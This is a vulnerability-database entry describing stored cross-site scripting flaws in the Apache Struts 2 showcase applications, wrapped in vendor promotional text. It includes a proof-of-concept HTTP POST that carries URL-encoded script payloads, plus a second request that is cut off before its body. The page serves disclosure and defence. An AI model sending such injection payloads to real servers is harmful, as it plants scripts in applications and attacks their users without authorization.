Lucene search

K

Apache Struts多个HTML代码注入漏洞

🗓️ 09 Feb 2012 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 24 Views

Apache Struts HTML code injection vulnerabilit

Show more
Related
Code

                                                POC 1:
-----
Stored XSS

POST struts2-showcase/person/editPerson.action HTTP/1.1

Host: SERVER_IP:8080
User-Agent: struts2-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

Post Data:
----------
persons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript
%3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2
Fscript%3E&method%3Asave=Save+all+persons


POC 2:
-----
Stored XSS

POST /struts2-rest-showcase/orders HTTP/1.1

Host: SERVER_IP:8080
User-Agent: struts2-rest-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
09 Feb 2012 00:00Current
9.0High risk
Vulners AI Score9.0
EPSS0.614
24
.json
Report